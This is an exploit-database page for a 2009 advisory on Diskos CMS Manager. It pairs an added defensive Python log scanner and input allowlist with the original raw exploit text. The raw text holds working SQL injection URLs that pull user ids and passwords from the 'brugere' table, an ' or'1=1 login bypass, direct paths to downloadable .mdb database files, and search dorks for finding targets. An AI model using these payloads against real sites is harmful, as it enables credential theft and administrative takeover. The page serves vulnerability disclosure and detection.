Vendor: Diskos CMS Manager
Author: AnGeL25dZ
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection & admin bypass & database disclosure
CWE: 89, 287, 522
Product Name: Diskos CMS Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2009

Diskos CMS Manager & multiple vulnerabilities

The 'kat' parameter of the 'side.asp' script is used in a SQL query without validation. An attacker can exploit this by supplying a malicious SQL query in 'kat' to disclose the database content (the advisory below uses a UNION SELECT against the 'brugere' table to read user ids and passwords). The authentication process can likewise be bypassed with a malicious SQL query (the advisory injects into the brugerid and password fields of the /diskos6/ login form), which can be exploited to gain administrative access. The advisory also reports that the Access database files under /db/ (log.mdb, artikler_prod.mdb, medlemmer.mdb) can be downloaded directly.

Mitigation:

The vendor has released a patch to address this issue. It is advised to upgrade to the latest version of the product.
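Beyond upgrading, an operator will want to know whether the patterns the advisory describes have already been tried against a site, and a developer will want the input check that should have been in place. The following is an added example written for this page; it is not code from the advisory author or from the Diskos product. It assumes an IIS W3C log layout of date, time, client IP, method, URI stem, URI query and status (the sample lines are constructed for the example), and it assumes that a valid 'kat' value is a plain positive integer, which is inferred from the advisory's dork "side.asp?kat=1" and is not confirmed by the page. The login-form bypass travels in a POST body and therefore does not appear in these URI logs; only the side.asp injection and the direct .mdb downloads are detectable here.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# Sample input written for this example, not real traffic. The two injected
# queries mirror the UNION SELECT requests listed in the advisory.
SAMPLE_LOG = """\
2009-03-30 10:00:01 203.0.113.5 GET /side.asp kat=1 200
2009-03-30 10:00:07 203.0.113.5 GET /side.asp kat=-1+union+all+select+brugerid+from+brugere 200
2009-03-30 10:00:09 203.0.113.5 GET /side.asp kat=-1%20union%20all%20select%20password%20from%20brugere 200
2009-03-30 10:01:15 203.0.113.5 GET /db/medlemmer.mdb - 200
2009-03-30 10:02:00 198.51.100.9 GET /side.asp kat=42 200
2009-03-30 10:02:30 198.51.100.9 GET /images/logo.gif - 200
"""

# Assumption: a Diskos category id is a small positive integer (the advisory's
# dork shows "side.asp?kat=1"). Anything else fails the allowlist.
KAT_ALLOWED = re.compile(r"^\d{1,9}$")

# SQL keywords that never belong inside a numeric category id.
SQLI_KEYWORDS = re.compile(r"\b(union|select|from|where|or|and)\b", re.IGNORECASE)


def is_valid_kat(value: str) -> bool:
    """Allowlist check the application should apply before the value reaches a query."""
    return bool(KAT_ALLOWED.match(value))


def parse_log_line(line: str):
    """Split one W3C-style line into a dict, or return None for malformed lines."""
    fields = line.split()
    if len(fields) != 7:
        return None
    date, time, client, method, stem, query, status = fields
    return {
        "ts": f"{date} {time}",
        "client": client,
        "method": method,
        "stem": stem,
        "query": "" if query == "-" else query,
        "status": int(status),
    }


def analyze(log_text: str):
    """Return a list of (timestamp, client, reason) findings for the advisory's patterns."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        stem = rec["stem"].lower()
        # Direct download of the Access database files under /db/.
        if stem.startswith("/db/") and stem.endswith(".mdb"):
            findings.append((rec["ts"], rec["client"], f"direct database file request {rec['stem']}"))
            continue
        if stem.endswith("/side.asp"):
            # parse_qs decodes both '+' and percent-encoding, so both sample
            # encodings of the injected query are normalised the same way.
            params = parse_qs(rec["query"], keep_blank_values=True)
            for kat in params.get("kat", []):
                if not is_valid_kat(kat):
                    reason = "sql keywords in kat" if SQLI_KEYWORDS.search(kat) else "non-numeric kat"
                    findings.append((rec["ts"], rec["client"], f"{reason}: {kat!r}"))
    return findings


if __name__ == "__main__":
    for ts, client, reason in analyze(SAMPLE_LOG):
        print(f"{ts} {client} {reason}")
```

The allowlist in is_valid_kat is the application-side fix that makes the side.asp injection impossible regardless of how the query is built; the log scan is the retrospective check an operator runs on a site that was exposed before patching. Serving the /db/ directory at all is the root cause of the disclosure finding, so a hit there warrants moving the .mdb files outside the web root rather than only blocking the URL.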

Exploit-DB raw data:

************************************************************
**         Diskos CMS Manager & multiple vulnerabilities
************************************************************
**  Product:		Diskos CMS Manager
**  Home   : 		http://www.diskos.dk
**  Vulnerability :	SQL Injection & admin bypass & database disclosure
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovered by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of H-T (http://h-t.cc/cc)
**		 All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIN :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**  
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
************************************************************** 
**  
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb 
** 		    artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************

# milw0rm.com [2009-03-30]